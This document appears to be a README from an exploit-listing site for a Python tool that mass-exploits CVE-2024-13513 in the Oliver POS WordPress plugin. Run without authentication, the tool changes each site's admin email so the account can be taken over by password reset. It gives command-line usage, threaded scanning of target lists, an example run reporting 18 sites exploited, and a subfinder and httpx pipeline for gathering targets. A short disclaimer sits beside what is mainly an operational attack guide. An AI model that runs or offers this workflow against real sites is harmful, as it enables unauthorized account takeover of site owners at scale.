## https://sploitus.com/exploit?id=020F514E-BEB1-59A3-A837-6E26E49BBF3D
Usage
Basic Usage
bash
python3 exploit.py -l targets.txt -e your-email@example.com
Advanced Usage
bash
python3 exploit.py \
-l targets.txt \
-e attacker@email.com \
-t 100 \
-o /path/to/results
Parameters Explanation
Parameter Description Required Default
-l, --list Path to file containing target URLs โ Yes -
-e, --email Email address for password reset โ Yes -
-t, --threads Number of concurrent threads โ No 50
-o, --output Output directory for results โ No Current directory
Input File Format
Create a text file (targets.txt) with one URL per line:
text
example.com
https://site1.com
http://site2.com
http://192.168.1.100/wordpress
https://vulnerable-site.org/blog
Output Files
The tool generates several output files:
vulnerable_targets.txt - All detected vulnerable websites
successfully_exploited.txt - Successfully exploited targets with email
Console Output - Real-time scanning progress and statistics
Example Execution
bash
python3 exploit.py -l my_targets.txt -e test@hacker.com -t 80
[ INFO ] Loaded 150 unique targets
[ INFO ] Using email: test@hacker.com
[ INFO ] Threads: 80
[ INFO ] Starting scan...
[ CHECKING ] http://example.com/
[ VULNERABLE ] http://example.com/
[ SUCCESS ] Email changed successfully: http://example.com/
[ NOT FOUND ] http://site2.com/
[ PATCHED ] http://site3.com/
==================================================
SCAN STATISTICS:
Checked: 150
Vulnerable: 23
Exploited: 18
Failed: 5
==================================================
[ INFO ] Execution time: 45.23 seconds
Advanced Examples
Quick Scan with High Threads
bash
python3 exploit.py -l urls.txt -e admin@test.com -t 200
Save Results to Specific Directory
bash
python3 exploit.py -l targets.txt -e test@domain.com -o ./scan_results
Combine with Other Tools
bash
# Use with subfinder and httpx
subfinder -d example.com | httpx -silent | tee targets.txt
python3 exploit.py -l targets.txt -e attack@email.com -t 100
Important Notes
Legal Disclaimer
โ ๏ธ This tool is for educational and authorized penetration testing purposes only.
Only use on websites you own or have explicit permission to test
Unauthorized access to computer systems is illegal
The authors are not responsible for misuse
Technical Details
Vulnerability: CVE-2024-13513 - Oliver POS Plugin < 2.4.2.4
Impact: Allows unauthenticated email change for password reset
Detection: Checks plugin version and existence
Exploitation: Extracts client token from logs and sends crafted request
Performance Tips
Use 50-150 threads for optimal performance
Ensure stable internet connection
Use quality target lists for better results
Monitor system resources during execution
Troubleshooting
Common Issues:
bash
# File not found
[ ERROR ] File not found: targets.txt
# Invalid email format
[ ERROR ] Invalid email format
# Network issues
[ CONN ERROR ] example.com
[ TIMEOUT ] example.com
Solutions:
Ensure target file exists and is readable
Use valid email address format
Check internet connection and firewall settings
Reduce thread count if experiencing timeouts
Output Interpretation
VULNERABLE: Website has vulnerable plugin version
SUCCESS: Email successfully changed on target
PATCHED: Plugin exists but version is patched
NOT FOUND: Plugin not installed or accessible
CONN ERROR: Connection failed
TIMEOUT: Request timed out
This tool provides comprehensive scanning and exploitation capabilities for security professionals conducting authorized vulnerability assessments.